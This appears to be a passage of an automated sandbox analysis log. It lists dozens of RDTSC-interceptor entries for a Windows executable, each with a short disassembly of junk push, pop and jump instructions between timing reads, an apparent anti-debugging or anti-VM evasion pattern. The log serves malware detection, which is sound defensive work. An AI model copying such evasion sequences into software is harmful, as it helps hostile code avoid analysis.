Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 982493 second address: 9824A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007F988C7CE316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F988C7CE329h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98278F second address: 9827C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0295h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jbe 00007F988D0B0286h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F988D0B0295h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9827C9 second address: 9827CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9827CD second address: 9827D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9827D3 second address: 9827D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 982A3D second address: 982A5D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F988D0B0294h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 982A5D second address: 982A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F988C7CE316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 982D7B second address: 982D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9832C0 second address: 9832C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9832C6 second address: 9832CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9832CC second address: 9832EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988C7CE324h 0x00000009 jns 00007F988C7CE316h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9832EA second address: 983317 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F988D0B0286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b je 00007F988D0B0286h 0x00000011 jmp 00007F988D0B0293h 0x00000016 pop esi 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 983317 second address: 98331B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98331B second address: 983352 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F988D0B028Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F988D0B0286h 0x00000012 jmp 00007F988D0B0298h 0x00000017 push edx 0x00000018 pop edx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9835FA second address: 983605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F988C7CE316h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 983605 second address: 98360B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98360B second address: 983611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 983611 second address: 983615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9838CA second address: 9838E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007F988C7CE31Eh 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9838E2 second address: 9838F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 ja 00007F988D0B0292h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9838F1 second address: 9838F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98BE12 second address: 98BE16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98BE16 second address: 98BE2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988C7CE31Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98BF89 second address: 98BF8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98BF8D second address: 98BF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F988C7CE316h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98BF9D second address: 98BFA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98BFA3 second address: 98BFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 994218 second address: 99421E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99421E second address: 994226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 994226 second address: 99422A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99422A second address: 994233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992335 second address: 992339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992339 second address: 99233D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99233D second address: 99235B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988D0B0295h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9924AB second address: 9924C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE329h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9924C8 second address: 9924CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9924CE second address: 9924DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F988C7CE31Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9924DF second address: 9924E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9924E3 second address: 9924EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99279C second address: 9927A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992A4A second address: 992A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992A4E second address: 992A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992A52 second address: 992A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992A58 second address: 992A5D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992BAA second address: 992BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988C7CE31Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992BBD second address: 992BDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0298h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992E96 second address: 992E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992FF9 second address: 992FFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992FFD second address: 993009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F988C7CE316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993009 second address: 993020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B0293h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99317B second address: 993187 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993187 second address: 99318D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99318D second address: 993191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993191 second address: 993197 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993197 second address: 9931AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F988C7CE316h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9931AA second address: 9931B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99396C second address: 993970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993970 second address: 993993 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F988D0B0286h 0x00000008 jmp 00007F988D0B0296h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99B611 second address: 99B617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99B617 second address: 99B61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99B61B second address: 99B647 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F988C7CE328h 0x0000000c jo 00007F988C7CE316h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99B647 second address: 99B64B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99B64B second address: 99B64F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99B64F second address: 99B65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F988D0B028Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99B0B1 second address: 99B0B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99B1E3 second address: 99B222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B028Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F988D0B0290h 0x00000010 pop edi 0x00000011 jng 00007F988D0B02A0h 0x00000017 push edx 0x00000018 jmp 00007F988D0B0292h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A869A second address: 9A86A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A86A0 second address: 9A86A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A86A4 second address: 9A86E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988C7CE31Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F988C7CE31Ah 0x00000011 jmp 00007F988C7CE31Fh 0x00000016 jmp 00007F988C7CE325h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A86E4 second address: 9A8714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0298h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F988D0B029Eh 0x0000000f jns 00007F988D0B0288h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A885D second address: 9A8862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AE8B6 second address: 9AE8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AE8BC second address: 9AE8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnl 00007F988C7CE31Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AE8C9 second address: 9AE8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AE8CD second address: 9AE8F4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F988C7CE31Eh 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007F988C7CE316h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 je 00007F988C7CE31Ch 0x00000019 jc 00007F988C7CE316h 0x0000001f jnl 00007F988C7CE322h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AE8F4 second address: 9AE902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F988D0B0286h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AE902 second address: 9AE908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AEA39 second address: 9AEA45 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F988D0B0286h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AEA45 second address: 9AEA4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B36EC second address: 9B36F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C22A5 second address: 9C22AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F988C7CE316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C22AF second address: 9C22B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C7F52 second address: 9C7F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C6EB2 second address: 9C6ED4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C6ED4 second address: 9C6EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007F988C7CE322h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C6EE1 second address: 9C6EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C6EE7 second address: 9C6EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C71B1 second address: 9C71B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C7C41 second address: 9C7C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C7C47 second address: 9C7C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C7C51 second address: 9C7C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C7C59 second address: 9C7C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C7C5E second address: 9C7C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jne 00007F988C7CE316h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CBCDD second address: 9CBCE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CB855 second address: 9CB87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F988C7CE316h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F988C7CE327h 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CB87D second address: 9CB882 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF94C second address: 9CF950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF950 second address: 9CF956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF956 second address: 9CF95C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF7FB second address: 9CF800 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF800 second address: 9CF806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DA4A9 second address: 9DA4B9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F988D0B0286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DA4B9 second address: 9DA4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DA4BD second address: 9DA4D8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F988D0B0286h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F988D0B028Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE38B second address: 9EE3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F988C7CE322h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE3A4 second address: 9EE3AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE3AA second address: 9EE3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE3AE second address: 9EE3CB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F988D0B0286h 0x00000008 jno 00007F988D0B0286h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F988D0B028Bh 0x00000017 rdtsc
